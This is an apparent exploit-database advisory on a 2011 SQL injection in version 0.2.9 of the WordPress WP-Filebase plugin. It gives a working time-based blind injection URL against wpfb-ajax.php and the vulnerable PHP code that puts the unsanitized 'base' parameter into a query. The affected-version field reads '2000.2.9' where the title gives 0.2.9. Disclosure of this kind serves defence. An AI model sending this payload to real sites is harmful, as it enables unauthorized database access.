WordPress WP-Filebase Download Manager plugin

vendor:

WP-Filebase Download Manager

by:

Miroslav Stampar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WP-Filebase Download Manager

Affected Version From: 2000.2.9

Affected Version To: 2000.2.9

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wp-filebase_download_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability

A SQL injection vulnerability exists in WordPress WP-Filebase Download Manager plugin version 0.2.9. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. This request contains malicious SQL code in the 'base' parameter of the 'wpfb-ajax.php' script. This code is then executed by the vulnerable server, allowing the attacker to gain access to sensitive information.

Mitigation:

Upgrade to the latest version of the WordPress WP-Filebase Download Manager plugin.

Source

Exploit-DB raw data:

# Exploit Title: WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability
# Date: 2011-09-09
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-filebase.0.2.9.zip
# Version: 0.2.9 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wp-filebase/wpfb-ajax.php?action=tree&base=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&root=source

---------------
Vulnerable code
---------------
if(!isset($_REQUEST['action']))
    die('-1');
...
switch ( $action = $_REQUEST['action'] ) {
    case 'tree':
        ...
        $base_id = (empty($_REQUEST['base']) ? 0 : $_REQUEST['base']);
        ...
        if(empty($_REQUEST['root']) || $_REQUEST['root'] == 'source')
            $parent_id = $base_id;
        else {
            $root = $_REQUEST['root'];
            $parent_id = is_numeric($root) ? intval($root) : intval(substr(strrchr($root,'-'),1));
        }
        ...
        $cats = $browser ? WPFB_Category::GetFileBrowserCats($parent_id) : WPFB_Category::GetCats("WHERE cat_parent = $parent_id ORDER BY cat_name ASC");